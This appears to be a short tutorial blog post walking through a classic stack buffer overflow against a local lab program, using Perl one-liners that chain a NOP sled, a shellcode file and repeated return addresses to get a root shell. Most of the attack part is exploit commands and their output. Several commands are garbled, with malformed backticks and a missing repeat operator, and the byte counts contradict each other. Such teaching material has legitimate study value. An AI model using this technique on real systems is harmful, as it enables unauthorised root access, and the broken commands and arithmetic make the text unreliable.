Exploit Shell code using Command-line

After reading our previous post:Exploiting buffer overflows using command line it’s time to do Exploit Shell code using Command-line but I think you do want to clear your doubt of previous post , so let’s know about how the number 38 was calculated in our previous case using with some simple module math.

(408 byte-200 bytes of NOP - 53 byte of shellcode) / 4 byte of address  = 38.75

when the Perl command was wrapped in bark-ticks ( ` ), they may be chain to make a larger series of character or numeric values for example we can make a 408-byte of string that can be using for attack and feed it to our vulnerable buffer.c program as follow.

root@buffercode:$ ./buffer mr `perl -e 'print   "\x90"x200'; ``cat  sc ``perl -e 'print "\xc0\xe5\xff\xff"38';`
Segmentation fault

this 405 byte string is used as second argument and then we create buffer overflow as follow:
:p 200 byte of NOPs (“\x90”).
:p 53 bytes of shellcode.
:p 152 bytes of repeated return address.
Since our buffer-overflow attack is only 405 bytes , as we expected , it crashed.It simply means our repeated address has some misalignment and they are overriding the saved return address.

Now we need to increment the number of NOPs to Exploit Shell code using Command-line as follows:

$./buffer hello `perl -e 'print "\x90"x201'; ``cat  sc ``perl -e 'print "\xc0\xe5\xff\xff"38';`
segmentation fault
$./buffer hello `perl -e 'print "\x90"x202'; ``cat  sc ``perl -e 'print "\xc0\xe5\xff\xff"38';`
$./buffer hello `perl -e 'print "\x90"x203'; ``cat  sc ``perl -e 'print "\xc0\xe5\xff\xff"38';`
Hello e'^^ttyFF
......truncated for bravity
.
.
.
sh-2.05b#

Woooooooooo it worked , now we are root user  Here important thing is that how we get access of root user from command line by incrementing the buffer value.